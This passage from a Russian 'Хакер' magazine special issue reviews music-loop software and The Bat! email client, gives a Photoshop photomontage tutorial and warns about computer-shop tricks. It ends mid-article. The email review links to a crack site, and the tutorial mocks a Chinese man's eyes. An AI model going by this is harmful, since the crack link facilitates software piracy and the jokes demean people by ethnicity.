Сначала Groovemaker. Она находится на сайте www.groovemaker.com и весит 10 мегабайт. Состоит она из трех модулей: groove, seq и v-mix (последний тебе для создания собственной композиции не понадобится, засим останавливаться на нем не будем — в демо-версии он почти бесполезен. Он вообще почти бесполезен. Неверующий может залезть в факинг мануал и убедиться в этом лично).

GROOVE предназначен для создания различных лупов, из которых впоследствии ты собираешь свой супер-мега-микс, так сказать, по кусочкам. В окне сей утилиты тебя с нетерпением поджидает интерфейс, который ты можешь наблюдать на скриншотах (словами объяснить, как и что выглядит в groovemaker’e, вообще довольно тяжело, поэтому руководствуйся картинками). Каждый отдельный синий кружок с номером — это канал для очередного сэмпла. Кликаешь мышью в кружочек, он подсвечивается, потом щелкаешь по названию сэмпла, который ты бы хотел подвесить на этот канал, в окне в правой части экрана. Таким образом, каждому кружочку (каналу) можно присвоить по сэмплу, и задействовано их будет максимум восемь. Любой канал можно включить или отключить в любое время, кликнув мышью на маленький список каналов наверху. Кроме того, каждому каналу можно присвоить любое значение громкости (слайдер справа) и пэннинга (там же).

Еще в GROOVE есть мощная штука под названием арпеджиатор. Это такой пианинообразный микросинтезатор для извращенцев, на котором можно создавать типа мелодию и все такое. Жуткая по звучанию вещь. Вызывается нажатием соответствующей кнопки в левой части экрана. Как работает — описывать бесполезно, проще потыкать и понять самому. Громко не включай — саунд у нее, мягко говоря, на любителя. Но если хочешь чтоб соседи съехали, то делай все наоборот.

Красный диск со счетчиками посередине экрана включает и выключает воспроизведение. Счетчики работают так: один отображает значение ВРМ, которое можно динамически менять слайдером внизу экрана, а второй считает биты (один луп составляет 8 раз по 4 бита). Один луп со всеми настройками можно сохранить с помощью кнопки «Groovemarker» (он появится в списке рядом с кнопкой под определенным номером), чтобы потом последовательно включать сохраненные лупы и создавать всю композицию в модуле SEQ. Так что наклепали лупов в GROOVE (их может быть всего 24) — и вперед, в SEQ.


Спецвыпуск хакер, номер #001, стр. 001-038-3, Сам себе Грув

Сам себе Грув

Холод

Спецвыпуск хакер, номер #001, стр. 001-038-3

SEQ служит для того чтобы создавать из лупов (тех, что ты сохраняешь с помощью Groovemarker’а) законченную композицию. Верхний список содержит все доступные после работы в GROOVE лупы (обозначены цифрами), а нижний — порядок их расположения в композиции. Драг-энд-дропом тащишь их из верхнего списка в нижний, на нужные позиции, а затем сохраняешь последовательность кнопкой «saveseq». Можно также экспортнуть твою композицию в Wave-файл, для этого есть кнопка «Мiх». Записал и тащишься. Не плохо, да? На самом деле он показался нам во многом без-нужды-усложненным и замороченным. Но в целом неплохая штука. Хотя...

Хотя для любителей чего-нибудь попроще и погорячей имеется уже упомянутая The Mixman Studio. Эта программа уже немного ближе к настоящим вертушкам, хотя и очень отдаленно их напоминает. Нам досталась полная версия (Mitino-bazar ruleZ), а дема лежит на www.mixman.com. 6 мегов чистого удовольствия.

Миксман (будем звать его по-русски) состоит из двух модулей. Mixing studio и Recording studio. В Mixing Studio перед тобою удобно расположились две типа вертушки (прикинь!). В отличие от Technics, у них специальные типа пластинки с кружочками, в которые надо грузить типа сэмплы — это аналог каналов в Groovemaker’e. Кстати, в Миксмане сэмплы существуют в двух видах: в виде обычных Wave-файлов и в виде трэков (tracks). Трэки более совершенны, так как в них звук разбит на ритмические группы, что позволяет не изменять его высоту при изменении BPM. В полной версии имеется стандартный набор треков, а с сайта можно качнуть свежачок трэков, который там пополняется чуть ли ни каждую неделю. В Миксмане представлена целая груда сэмплов в самых разных стилях: от Jungle до Reggаe.

Основная радость при игре в Миксмане — это расположение пальцев на клавиатуре. Они удобно раскидываются грамотной распальцовкой по кнопкам — это динамично выглядит со стороны. Пользователь Миксмана, играющий на вечеринке, где есть девушки, может с уверенностью сказать: «Все бабы наши!» Врубай плэй и нажимай со всем понтом, на который только способен, клавиши включения и выключения каналов — вот практически все, что потребуется тебе для написания полноценной музыки. В этой программе имеются почти все примочки, вроде выставляемого питча, пэннинга, громкости для каждого сэмпла. Когда юзаешь Миксман, напрягаешься минимально и при этом получаешь максимум удовольствия. Свои миксы можно запросто записать (без всяких напрягов а-ля тот же Грувmaker), а потом сохранять и крутить друзьям. Благо, интерфейс тут действительно интуитивный, все понятно почти сразу, даже таким бакланам, как мы.

В Recording Studio все тоже очень просто. Подключаешь к тачке микрофон и записываешь собственные сэмплы. Потом они влегкую импортируются в Mixing studio. Правда, прямо скажем, свои сэмплы лучше создавать в каком-нибудь простеньком Wave-редакторе, вроде Coolpro. Красивей получается.


Спецвыпуск хакер, номер #001, стр. 001-038-4, Сам себе Грув

Сам себе Грув

Холод

Спецвыпуск хакер, номер #001, стр. 001-038-4

Миксман студио — действительно веселая прога, она доставит неискушенному человеку массу удовольствия. А у искушенных мы спросим: кто знает, кто такой George Clinton? Ты знаешь? Если да, то обязательно залей себе на комп Р-Funk edition с того же www.mixman.com. 5 мегабайт чистого фанка. Если ты изо всех Клинтонов на свете знаешь только Билла Левински, то тем более залей прогу — тебе понравится.

На самом деле, это тот же Миксман. Только с другой подборкой сэмплов — здесь она исключительно фанковая. Этот самый Клинтон — известный человек в фанки-кругах. Так вот, у него иссякла творческая потенция, и он предложил всем желающим сделать ремиксы на его песни. То есть Р-Funk составлен исключительно из Клинтоновских сэмплов. Мало того, на фоне включаемых вручную сэмплов старик собственноручно читает какой-то рэп, и ему подпевают какие-то бабищи. Очень круто звучит!

И самое главное. До Х дошел слух, что старик Клинтон предлагает всем желающим высылать ему свои ремиксы, лучший из которых якобы войдет в его новый альбом последним треком. Так-то! Как че-нть напишешь, сразу давай, прыгай за модем и срочно отсылай дедушке — ему понравится.

Ну, так вот и решилась твоя маленькая таска, связанная с творческим голодом. Трех этих программ тебе должно хватить примерно на месяц запойного творчества, как раз до следующего номера Х. Нам из них, на самом деле, больше всего понравилась The Mixman Studio — простой и не грузящий зазря продукт с набором хороших сэмплов. Но на вкус и цвет в этой жизни, как известно, много чего нет, так что попробуй все три. Держи флаг, и все герлы очень скоро станут воющими фанатками твоего грувмакермиксманстудийного творчества.

На этой оптимистичной ноте тебя и оставим. Все. Удачных миксов.


Спецвыпуск хакер, номер #001, стр. 001-040-1, X-почту доставляют только Вампиры!

X-почту доставляют только Вампиры!

Avalanch

Спецвыпуск хакер, номер #001, стр. 001-040-1

Друг мой, я даже с тобой спорить не буду, зная, что ты бежишь сломя голову либо с работы, либо с учебы (у каждого свои приходы :)) домой не для того, чтобы накормить любимого попугая или посмотреть очередную серию «Чудеса науки». Тебе нужно другое! Догадался, о чем я? Правильно! О старичке Пентиуме и его кузене Модеме Момедовиче! Начинаешь мучить свой дряхленький, но надежный диалер, требуя немедленной связи с ее величеством Глобальной. А замечал ли ты, куда ты идешь сначала? А вот я заметил! Как за собой, так и за парой-тройкой тебе подобных — они ресивят почту. Ну как же? А вдруг Вован новый кряк прислал? Или Vituha14 (как правило, в роли Vituha14 выступает старый дружок по чату или по какой-нить конфе) все-таки выпросил фотку у Olya_love вчера в мирке и додумался прислать ее старому ловеласу, то есть тебе! Либо ты вчера успешно познакомился с топ-моделью где-нибудь «У Камина», и она тебе клятвенно обещала прислать признание в любви на 17 языках! Как закадрить девочку из чата, мы уже проходили — смотри лекцию профессора Левински!.. Что-то я замечтался... :)

Итак... Могу поспорить, что 80% homo, простите, sapiens ресивят почту опаснейшим тандемом вирусов Outlook Express и Netscape Mail (далее OE&NM). Вкратце о них. Это два самых распространенных вируса, поражающих как нервную систему их владельца, так и твой компьютер. К тебе когда-нибудь приходил злой дядька «дисконнект»? Это они, не сомневайся! Эх, Микрософт, как много в этом звуке... Поэтому пока поставь uninstall’чик, а я тебе расскажу о действительно крутой проге, которая сейчас стоит даже у самого не уважающего себя хацкера. Кульминация... «The Bat!».

Мой первый Вампирчик

Немного истории. В засекреченной лаборатории где-то в районе города Кишинева работал один дядя. Звали его Стефан Танурков. Вот он-то и пронюхал, что басурманы намеренно засылают нам пресловутый дуэт OE&NM, чтобы поубивать наши компьютеры и свести с ума люд русский, полностью подчинив его себе. А потом напасть войной и захватить всех кул хацкеров, вроде тебя к себе на МелкоСофт! Но дядя Стефан узнал об этих страшных планах и решил свергнуть правление буржуйских мэйлеров-вирусов, сделав свой суперантивирусно-универсально-портативный мэйлер! И, чтобы не привлекать внимания тамошних шпионов, назвал что свою компанию (Rit Research Labs), что мэйлер по-англицки — The Bat! Кстати, дядя Стефан еще ко всему прочему и папа Дос Навигатора (такая прога типа Нортона). Заядлые компьютероманы помнят еще времена «трешек и пятого ДОСа».

Все, как, впрочем, и я, восприняли это событие без особого энтузиазма. А зря! «Вампирчик» прожил тогда у меня не больше 15-ти минут. Версия была на месяц, сама программа денежку стоила, какие-то непонятные кнопочки, менюшки, не-е-е, не годится!

Пусть лучше OE убьет мой компьютер, чем какая-то мышь, простите, летучая будет месяц сосать мою кровь, сообщая каждый день, сколько еще она у меня проживет. Прости, Бэтти, ты была всего лишь мимолетным увлечением, я люблю Аутлук!.. :( Слёзы ручьем, валерьянка и успешный Uninstall! Не прошло и двух дней, как я узнаю, что все мои друзья-компьютерщики сломя голову ставят себе The Bat, успешно его крякают и нарадоваться не могут. Начинаю узнавать мейлер поближе и понимаю, как я облажался, когда убил его. Скоренько скачиваю обратно (кстати, занимает он всего около полутора МетроВ). Устанавливаю. Начинаю лазить во всяких функциях, опциях и прочих «-циях». Где-то через месяц понимаю, что я облажался и пора уже убивать Outlook. Прикинь! Нонсенс!


Спецвыпуск хакер, номер #001, стр. 001-040-2, X-почту доставляют только Вампиры!

X-почту доставляют только Вампиры!

Avalanch

Спецвыпуск хакер, номер #001, стр. 001-040-2

Ближе к телу

«Вампирчик» прежде всего,

конечно, поразил меня количеством функций. Я тебе как хацкер хацкеру скажу: такой тучи всяких фенек нет пока еще ни в одной проге.

Во-первых, заводи хоть 839 почтовых ящиков и на каждый ставь любую кодировку. Если ты не хочешь, чтобы твоя девушка (мама, брат, соседи по камере) во время расклада своей любимой «Косынки» наткнулась случайно на твою переписку с Mashul`ей, в которой ты взахлеб описываешь, что ты будешь с ней делать, когда ее родители рванут на дачу — ставь на ящик пароль!

Всего два раза клацнуть мышкой. Элементарно! Кстати, об элементарном: интерфейс у этой программулины настолько примитивный, что даже твой 5-летний сосед Митя сможет послать письмо, куда его душе будет угодно, правда, то, что он напишет, я думаю, для всех останется загадкой! :)

Во-вторых, если ты во время уроков английского пил пиво с друзьями и кроме выражения «Фак офф, мазефака», услышанного в боевике, ничего из басурманского не знаешь — нет проблем! Качаешь небольшой языковой модуль с сервера и устанавливаешь у себя хоть чешский язык, если заняться нечем. Никому мыло на чешском не отправлял? Попробуй. :)

В-третьих, если твоя подружка по мирку после долгих уговоров все же решила послать тебе фотку и, мало того, послала. А фотка-то bmp-шная. И весит мега 2 в лучшем случае. Да еще и твой Outlook начинает качать ее первой — что ты будешь делать? Правильно! Материть и подружку, и Outlook! Bat же с этим делом знаком давно. Запускаешь встроенный диспетчер почты, лезешь с помощью него прямо на сервак и удаляешь эту фотку ко всем чертям прямо на сервере, не скачивая себе. А потом доходчиво объясняешь подруге, что такое jpeg.

В-четвертых, если тебе каждый раз надоедает писать в начале мыла «Здарова, перец!», а в конце «Посылайте ответы на... Без уважения. Гиви Хакеридзе.» — опять же все просто. Взял и поменял шаблон письма. И когда в следующий раз нажмешь «создать сообщение», у тебя сразу появится шаблон со всякими «Здарова...» и всем прочим, на что у тебя хватило воображения.

В-пятых, если настроить «Вампирчиковские» шаблоны, макросы и фильтры под себя, можно будет вообще ничего не делать, кроме как только писать текст письма, а уж что получить, куда послать и на сколько букв, разберется сама прога.

В-шестых, всеми любимая адресная книга (память-то у нас хацкерская). Попробуй запомни адресок: Kthgkds35W @dialup.ptt.ru. Слабо с ходу?.. Опять же примитивно до нельзя! Создай новую и аттач адреса прямо из приходящих сообщений!.. Клацк-клацк мышкой — и готово! Да и к тому же к каждому адресу в твоей книге ты можешь указать сто-о-олько информации, что уж точно никогда не забудешь, кто это такой. Ну а если все равно забудешь, то в адресной книге «Вампирчика» можно еще и фотку воткнуть к каждому адресу.


Спецвыпуск хакер, номер #001, стр. 001-040-3, X-почту доставляют только Вампиры!

X-почту доставляют только Вампиры!

Avalanch

Спецвыпуск хакер, номер #001, стр. 001-040-3

В-седьмых, хочешь, чтобы твое сообщение секретарше Лене не прочитали все сослуживцы? И втихаря похохотали! А если ты банкир или мафиози? И коды замков разнообразных своему шефу посылаешь? Ты же кульный хакер, и то, что это дело надо шифрануть, ты понял сам! Этим занимается PGP (Pretty Good Privacy). Качаешь себе эту прогу (http://www.pgpi.com), устанавливаешь, и «Вампирчик» ее АВТОМАТИЧЕСКИ подсасывает в себя. Круто звучит? Выглядит, поверь, не хуже! :) Расшифровывать, поверь, будут долго!

В-восьмых, если тебе неохота переписывать все признания в любви Маши, Оли и еще десятка девушек, кряки и коды из старенького Outlook’а в Бэт, то легонько выбираешь импорт сообщений и перетаскиваешь весь свой архивчик в Bat! Минуты полторы уйдет, а печатал бы дня четыре.

В-девятых, «Вампирчик» поддерживает кучу протоколов — IMAP4, POP, APOP, SMTP. Мало того, Bat еще и имеет функции почтового сервака локалки. TCP/IP — Non TCP/IP шлюз. Что-то я тебя совсем загрузил! :) Ну да ладно, для тебя будет важно, что «Вампирчик» имеет встроенный примитивный текстовый редактор, если у тебя по русскому языку оценка колеблется между двойкой и тройкой, плюнь — проверка орфографии есть, причем автоматическая, будешь создавать видимость профессора-лингвиста. И встроенный диалер тут как тут: если делать нечего, коннекться с сеткой прямо из Бэта. Бегущая строка «Mail Ticker» все расскажет: что за почта на серваке пришла, от кого, сколько, когда — будешь в курсе! Я, правда, не пользуюсь этой фенькой — у меня аська сообщает, что, когда и как пришло. Но на вкус и цвет... А вот теперь перечитай все это и подумай. Программа с кучей функций (про некоторые я не сказал — потребовался бы целый журнал), интуитивным интерфейсом и всеми остальными делами весит всего полтора мега. А теперь глянь, сколько места у тебя нагло сожрал Outlook. Кстати, всякие злые бэги, которые находятся в проге, исправляются очень оперативно, и на сервак приходят каждый раз все новые и новые усовершенствованные версии «Вампирчика». Единственный бэг, который я обнаружил, когда юзал последний The Bat! 1.22 — это то, что мейлер не поддерживает HTML’а. (Это в программе сделано специально, для защиты от html-ных вирусов. Письмо в HTML’е лежит аттачем, и при желании его можно посмотреть в браузере. Прим. редактора). Если ты подписан на каком-нибудь серваке новостей типа www.citycat.ru, ты меня поймешь. Новости там приходят в HTML’е на почту. Ну да ладно, мы не гордые — и в експлорере почитаем. Так ведь? Кстати, ты Outlook убил уже? Залезай в сетку и качай The Bat! Не давай вирусу уничтожать свой компьютер! Удачи!

Последнюю версию проги The Bat! 1.22 ты можешь качнуть на

http://www.ritlabs.com/the_bat.

А крек на нее на www.chat.ru/~tapin13/news.htm.


Спецвыпуск хакер, номер #001, стр. 001-042-1, Х-дизайн

Х-дизайн

Сaptain Колбасьев

Спецвыпуск хакер, номер #001, стр. 001-042-1

Нет, скажи мне, друг, ведь ты всегда мечтал очень крупно и мощно приколоться над своим близким другом/боссом/любимой девушкой/ просто родственником? Да сделать это не стандартной методой подложения канцелярских кнопок под толстые джинсы или же любимым методом зажравшихся янки — киданием кремовых тортов в лицо потенциальному противнику. Не-е-ет! Мы живем в век компьютеров и высоких технологий, а потому кнопки в заднице и крем на морде — уже не слишком актуально, и вот поэтому...

Исправим ситуацию

Вот глянь-ка лучше на этого выразительного китайца на фотографии. Положим, что это и есть объект твоих дальнейших экспериментов. Правда, может возникнуть резонный вопрос — почему именно никому не известный китаец, а не, скажем, знаменитый артист или политический деятель? Объясняю: с артистами (а тем более с политиками) можно нажить кучу проблем и врагов, а вот в Китае живет более миллиарда людей, и пока меня найдут...

Ну, да не будем о печальном, посмотрим лучше на нашего Лю-Канга поближе, как говорят другие высокохудожественные издания, «сквозь лупу графического редактора Adobe Photoshop» (желательно не ниже версии 5.0). Что? Ты не знаешь, что такое «Фотошоп»?! Ну тогда иди лучше завари чайку в своем бурнокипящем чайнике, мы тут серьезными делами займемся, а не ликбез будем устраивать... Короче, вздумалось как-то нашему восточному гостю доказать, что летом он побывал в столице мод — Париже. Что делать? Ну, допустим, у нас есть фотография Эйфелевой башни (для глупых: это такая радиоглушилка в Париже, чтобы не слушали всякий там «Голос Америки»). Так вот, следовательно, нам требуется нашего Лю на эту фотографию поместить. Ну, естественно, вырезать его профиль специальным инструментом типа «аркан» никто не собирается, поэтому применим быстрый, но весьма эффективный метод вырезать (в самом хорошем смысле этого слова) нашего улыбчивого китайца.

Этот способ заключается в «обводке» профиля Лю контрастным с его портретом цветом. Страшно звучит, но значит это всего-навсего то, что мы должны использовать такой цвет, который бы не сливался с другими цветами на границе обводки. В нашем примере очень удобно использовать обычный красный цвет.

Создав китайскому другу необходимую красно-коммунистическую ауру, закрасим весь остальной фон картинки тем же цветом.

Надо добавить, что это далеко не единственный метод подобного фотомонтажа. Но зато самый действенный в нашем случае. Существует еще один интересный способ «подгона» одного изображения под другое: требуемое изображение вставляется под слой исходного, а затем на исходном попросту протирается «ластиком» (Eraser tool) нужное «окошечко», сквозь которое будет просвечивать требуемая картинка. Но для каждого случая лучше всего применять свой метод, так что закончим с этим. Пока.

И за каким мы, спрашивается, все это выделываем? А за таким, чтобы потом любимым фотошоповским инструментом дядюшки Мокуса — magic wand, в народе именуемым просто «волшебной палочкой», выделить весь кумачовый цвет. Но эта зона выделения (подумать только, как это звучит!) нам не нужна. А нужно то, что находится как раз вне нее. Это лечится! Выбираем из меню «Select»-«Inverse» — и получаем готовенького Лю! Только и в этой сдобной булочке кроется очередной напильник: обводя китайца по контуру, наша рука могла дрогнуть, соответственно, линия — немного съехать в сторону, и как результат — мелкие зазубрины по всему краю контура. Ну и на этого Карлсона с винтом у «фотошопа» имеются средства. Из того же меню работы с выделениями (нет, согласитесь, а это все же звучит!) выбираем «Modify» — «Contract» и в открывшемся окне вводим, на сколько пикселей требуется сжать границу китайского профиля. Ну, учитывая высокую плотность населения в Китае и общие масштабы нашей картинки, можно вполне ограничиться 2-3 пикселями. Фу-уф, с этой частью покончили. Смело копируйте Канга в буфер (CTRL+C) и вставляйте (CTRL+V) на фон парижской достопримечательности.


Спецвыпуск хакер, номер #001, стр. 001-042-2, Х-дизайн

Х-дизайн

Сaptain Колбасьев

Спецвыпуск хакер, номер #001, стр. 001-042-2

Смотрится? По-моему, не очень. Продолжим опыты, но для начала нужно прочитать еще одну нудную, но все же необходимую для дальнейшего повышения производительности нашего труда лекцию. Про слои. Дело в том, что Adobe PhotoShop выгодным образом отличается от всех его ближайших конкурентов наличием одной маленькой особенности: все изображения в нем рисуются не на одном «холсте», а на особенных слоях. Со стороны это напоминает процесс чистки лука (репчатого): снимаем верхнюю кожуру, под ней обнаруживается еще один ее слой, под этим слоем новый и так далее. Вот и в нашем примере существует два слоя: «подложка» с изображением парижской башни и верхний слой с портретом китайца. Итоговая картина будет напоминать собой составление фото-коллажа (или, если будет угодно, аппликации). Со слоями можно делать что угодно — удалять, менять приоритет в расположении (этот «выше», этот «ниже», этот вообще в качестве «бэкграунда»), делать слои полупрозрачными, склеивать их, наконец. К чему я все это рассказываю? А к тому, что, правильно научившись работать со слоями (просто поэкспериментировав с меню Layers), можно добиться просто потрясающих результатов в фото-дизайне как таковом и в «фотошопе» в частности...

Теперь изврат

Так как то, что было до этого — всего лишь прелюдия к настоящим издевательствам над бедным жителем страны-родины культурной революции. Или, как уже говорилось выше, перейдем к ИЗВРАТУ. Только не в смысле 117 статьи УК РФ, а в самом что ни на есть добром и ГУМАННОМ смысле...

Ну-с, для начала подправим глазки. И не говорите мне, что у него их попросту нет! В одной очень сложной науке с труднопроизносимым названием это называется «ярко выраженным разрезом глаз». Ничего, расширим. И если на Западе за подобные операции нашему Лю пришлось бы заплатить не меньше, чем М. Джексону за чудесное «отбеливание», то «фотошоп» все сделает почти безвозмездно, то есть даром. Увеличиваем масштаб и далее начинаем «растягивать» глаза инструментом «smudge» (или, по-русски, «палец»). Как действует этот самый «палец», станет ясно после 3 секунд его применения, только помните: Святослав Федоров учил быть осторожным с глазами, а посему я бы тебе посоветовал использовать при растягивании «кисти» поменьше, кабы вместо глаза вся Кангова физия не сползла...


Спецвыпуск хакер, номер #001, стр. 001-042-3, Х-дизайн

Х-дизайн

Сaptain Колбасьев

Спецвыпуск хакер, номер #001, стр. 001-042-3

Получив достаточно широкую «глазную щель», вплотную займемся поисками «глазного донора». Благо, такой доброволец быстро нашелся. Вот он, смешной такой, на картинке.

Уже опробованным на безропотном китайце методе выреза отдельных... хм... частей картинки вынимаем у донора его выразительный глазик (кстати говоря, донорский глаз можно было заполучить еще одним методом: так как он (глаз) имеет идеальную круглую форму, то его можно было вырезать простым «круглым арканом» (elliptical marquee tool)) и... нет! Вовсе не вставить его (глаз опять же) Лю, а подогнать под нужный размер монголоидного лица. Для этого существует волшебная опция «трансформация» («Edit» — «Free transform»). Тягая изображение за нужные узелки, ему очень скоро будет придан необходимый размер, и теперь можно приступать к трансплантации в итоговую картинку. Благо эта технология была уже описана выше, когда наш подопытный кролик вживлялся в компанию лягушатников на фоне башни...

Итак, посмотрим на итоговый результат...

“Да уж”, как говорил известный предводитель команчей Киса Воробьянинов. Слева вроде китаец японцем, а вот зато справа... А при необходимом навыке работы с пальцем («фотошоповским») можно придать еще незабываемые очертания восточному уху объекта наших терзаний.

А выводы?

Уж уволь, друг, но делай их сам. Я выше только что объяснил, как обращаться с очень мощными инструментами на самом примитивном уровне, но, уж поверь мне, наличие самого элементарного воображения и растущих из правильного места рук открывает просто безграничное, как русское поле, пространство для опытов и экспериментов. Ваша голова на «остове» от «мистера вселенная»-98? Почему бы и нет! Вашему брату нравятся дикие животные, и он «тащится» от передачи «В мире животных»? Пущай получает себе на фотографию морду орангутанга в подарок к 8-му Марта. А как модно будет смотреться американский президент в вашей скромной компании... Или вот, например...

А что говорить, лучше для пущего эффекта подарю-ка я еще одну картинку напоследок. Вот, Билл Гейтс с моей собакой...


Спецвыпуск хакер, номер #001, стр. 001-044-1, Как кидают лохов при покупке компьютеров

Как кидают лохов при покупке компьютеров

Спецвыпуск хакер, номер #001, стр. 001-044-1

Shadow of Darkness (shoda@mail.ru)

Итак, наконец настал тот прекрасный день, когда ты или твои родители решились купить компьютер (ну или какой-нибудь прикольный девайс к нему). Что же ты делаешь? Сначала ты просматриваешь все попавшиеся под руку газеты в поисках объявлений компьютерных фирм. Сравниваешь цены, подбираешь конфигурацию, смотришь на изготовителей комплектующих и так далее. Потом ты обзваниваешь понравившиеся тебе варианты. Вот тут-то и начинаются разочарования. При звонке в фирму цена компьютера несколько отличается от цены в рекламе. Вот тебе и первая шалость продавцов. Да, цена в рекламе реальна и она может присутствовать в прайс-листе, но это может быть и оптовая цена, и цена базовой конфигурации. Ты когда-нибудь, слышал о базовых конфигурациях?

Засада

в рекламе

А ты видел рекламу, в которой указывается, что системный блок РII400 стоит приблизительно 300 у.е.? Это истинная правда! Только, как ты думаешь, хорошо ли будет работать системный блок РII400 с 8-ю мегабайтами оперативки, винтом на 1Gb, отсталой видюшкой на 1Mb, да еще и без монитора? У меня лично работоспособность такого системного блока не вызывает сомнений, но вот толку от такой конфигурации я не вижу практически никакого. Но предположим, что при беглом взгляде на рекламу тебя все устроило и, вообще, ты радостно улыбаешься как гуимплен от всего того, что тебе пообещали при разговоре по телефону. И вот настает эта долгожданная суббота (да, именно суббота — компьютеры для дома у нас в другие дни практически не покупают), и ты со всей семьей поехал в компьютерный магазин за дорогостоящей покупкой. Вот тут-то и начинается самое интересное.

С чего начинается

развод

Для начала приготовься к тому, что таких семей, как у тебя, в данном магазине будет несколько, а продавцов на всех будет катастрофически не хватать (кому ж охота работать по субботам). Но вот ты подошел к столу для оформления заказов. Вот тут-то продавец в старых традициях испанской инквизиции начинает тебя пытать, что бы ты хотел, какой суммой располага-

ешь (это будет основной вопрос), что ты на этом компьютере будешь делать (в игрушки играть или в Ворде печатать), и таких вопросов тебе зададут десятка полтора. Но и это еще далеко не все. Дальше пойдут технические вопросы... А какую тебе “маму” поставить, а сколько мозгов запихнуть, а какой фирмы винт ты предпочитаешь, сколько хочешь скоростей у сидюка, какую видюху? И таких вопросов будет тоже немало. Тут-то и скрывается вторая шалость. Обычно в каждом магазине есть залежалый товар, то есть качество которого оставляет желать лучшего, а когда ты посмотришь на цену, то не поймешь, цена ли это или номер телефона. Но продавцы всегда с нетерпением ждут семейку, которая совершенно не разбирается в компьютерной технике и комплектующих, дабы спихнуть им этот отстойный девайс. Причем бешеные цены тебе будут объяснять внегалактическим качеством и гарантией на 200 световых лет (забыв поставить гарантийный штампик). Бывает, сотрудник продает что-нибудь из своих личных комплектующих, но об этом обычно предупреждают. Но и это еще не все.


Спецвыпуск хакер, номер #001, стр. 001-044-2, Как кидают лохов при покупке компьютеров

Как кидают лохов при покупке компьютеров

Спецвыпуск хакер, номер #001, стр. 001-044-2

Качество девайсов

Ты разбираешься в комплектующих? Нет... А зря. Для тебя материнская плата “MegaOtstoy” и “Asus” — одно и то же, только ты никак не возьмешь в толк, почему одна из них стоит 50, а другая 150 у.е.. Вот и еще одна проблема. Есть такие вещи, которые легко заменить, но есть и такие, которые покупаются надолго (монитор, корпус, материнская плата...), и вот их-то как раз и надо покупать хорошие и качественные. А далеко не все продавцы заинтересованы в этом, да и люди не всегда хотят платить деньги за качество — к сожалению, определяющим фактором до сих пор остается цена. Вот поэтому-то очень часто тебе будут пытаться впарить левак, уговаривая, что он ничем не отличается от крутой фирмы. Бывает и наоборот, когда продавец заведомо пытается впарить тебе самые крутые девайсы, естественно, с самыми крутыми ценами (это его работа, приятель).

Brand’ы

Но хуже всего, когда тебе впаривают “brand name”. Я не являюсь сторонником brand’ов (то есть компьютеров известных фирм, таких как Dell, IBM, Compaq...), но стараюсь быть объективным. Дело в том, что “родные” компьютеры являются заведомо качественными, но они практически не поддаются апгрейду, а это существенный недостаток при сегодняшнем росте производительности. Обычно такие компы покупают крупные фирмы, для которых основной критерий — качество, а апгрейдить они их все равно не будут. Да и потом я призываю поддерживать российских производителей. Так что будем считать, что brand’ы — не для нас. А теперь вернемся к нашим баранам, в смысле, компьютерам российской сборки. Тем более, что эти компьютеры ничем не хуже. И заострим внимание на конфигурации. Дело в том, что продавцы порой заостряют твое внимание не совсем на том, на чем следовало бы. Это, если можно так выразиться, невинная шалость. То есть тебе предлагают взять монитор подешевле, а системный блок получше. Я не берусь утверждать, хорошо это или плохо — это решать тебе, просто на мой взгляд лучше взять поменьше оперативной памяти или объема винта и на этом сэкономить денег, чем экономить на собственном зрении. Я не буду давать советов, что лучше или хуже, это было бы не совсем объективно. Да и потом у меня есть некоторый опыт покупки и продажи как компьютеров, так и комплектующих. Но вернемся собственно к покупке компьютера.

Софт

После того как ты обговорил конфигурацию и оплатил будущую покупку, тебя так ненавязчиво спрашивают о программном обеспечении. Вот тут-то и кроется, собственно, обман. Сразу оговорюсь, далеко не во всех компьютерных магазинах так происходит, но все же это имеет место быть. Тебе предлагают установить на твой компьютер некоторые необходимые для работы программы. Дело в том, что, как правило, Windows’95/98 входят в комплектацию твоего компьютера, и это никак не должно (теоретически) влиять на цену системного блока. Но когда тебя убеждают заплатить 100 рублей за установку Word’а или Excel’я, то вот это должно вызвать у тебя подозрение. Есть много шансов, что это будет так называемый пиратский софт. Я ничего против пиратов, а тем более против болгарских сборников с программами не имею, да и плохого в этом я ничего не вижу. Но вот наглый обман я не люблю. Любой человек может установить необходимую ему программу на свой компьютер. Заплатил 60 рублей, купил себе диск да устанавливай, что хочешь. Все просто. Это не стоит тех денег, которых от тебя требуют. Да и потом, если не пробовать, то ничего и не получится. Начинать знакомство с компьютером следует именно с установки необходимого тебе программного обеспечения. Все, что тебе устанавливают, должно быть либо бесплатно, либо тебе просто обязаны выдать на руки диск с этой программой. Так что если этого не случается, то можешь быть уверенным, либо у тебя нелицензионный софт: либо на тебе пытается нажиться продавец. Я опять же против этого ничего не имею, но тебе это может и не понравиться.


Спецвыпуск хакер, номер #001, стр. 001-044-3, Как кидают лохов при покупке компьютеров

Как кидают лохов при покупке компьютеров

Спецвыпуск хакер, номер #001, стр. 001-044-3

Скидки

Теперь давай поговорим о скидках. Как правило, продавцы и в рекламе, и в телефонном разговоре обещают тебе скидки, но на деле (при покупке) все оказывается не совсем так. Почему же так происходит? Да просто потому, что для продавца важно, чтобы ты пришел именно к нему в магазин, и он всеми возможными способами пытается тебя туда завлечь. Зачем ему это? Это еще проще. Придя в магазин, ты обязательно что-нибудь купишь, не сегодня — так в следующий раз, но магазин останется у тебя в памяти, вот для этого продавцы и стараются тебя заманить к себе. Так что не особо раскатывай губенки на получение крутых скидок. Скидка не для тебя — скидки для оптовиков. А вот наиболее распространенный слух о том, что продавцы часто “разгоняют” процессоры, я вынужден развеять. Дело в том, что это невыгодно делать по нескольким причинам:

- Сборщик, а именно он технически может это сделать, расписывается в гарантийном талоне каждого собранного им компьютера. Так что в случае “разгона” он за это и отвечает.

- Компьютеры сейчас не пломбируются, так что конфигурацию можно проверить “не отходя от кассы”.

- Компьютерные фирмы начали переживать за свое имя. За это имя многие из них бились не один год, так что терять имя из-за какой-то ерунды им явно не хочется.

Явная подстава

